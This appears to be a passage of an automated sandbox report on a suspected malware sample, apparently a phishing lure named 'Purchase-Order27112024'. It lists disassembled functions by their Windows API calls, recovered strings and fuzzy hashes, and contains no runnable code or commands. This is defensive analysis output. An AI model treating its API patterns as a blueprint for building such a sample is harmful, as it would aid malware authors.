                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4131475296-0
                                                                                                      • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                      • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFilefreememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507021081-0
                                                                                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4131324427-0
                                                                                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PathTemp$free
                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                      • API String ID: 924794160-1420421710
                                                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                      • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                      • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                      APIs
                                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                                      • String ID: General
                                                                                                      • API String ID: 999786162-26480598
                                                                                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                      • _snwprintf.MSVCRT ref: 0040977D
                                                                                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                      • String ID: Error$Error %d: %s
                                                                                                      • API String ID: 313946961-1552265934
                                                                                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                      • API String ID: 0-1953309616
                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                      • API String ID: 3510742995-272990098
                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2241099983-0
                                                                                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4053608372-0
                                                                                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 4247780290-0
                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1471605966-0
                                                                                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                      APIs
                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
